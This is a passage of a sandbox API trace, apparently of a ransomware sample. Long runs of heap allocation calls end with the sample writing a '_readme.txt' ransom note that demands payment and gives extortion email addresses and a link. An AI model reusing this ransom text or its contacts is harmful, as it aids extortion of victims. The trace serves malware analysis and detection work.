Size=0x860) returned 0x3a83058 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.676] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.676] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.677] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.677] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.678] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.678] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.679] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.679] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.680] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.680] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.681] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.681] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.682] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.682] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.683] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.683] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.684] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.684] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.684] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.684] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0209.684] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.684] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.684] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.684] PathFindFileNameW (pszPath="") returned="" [0209.684] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.685] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.685] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.685] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.685] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.685] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.685] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.685] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.685] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.685] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0209.687] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.687] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.687] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal 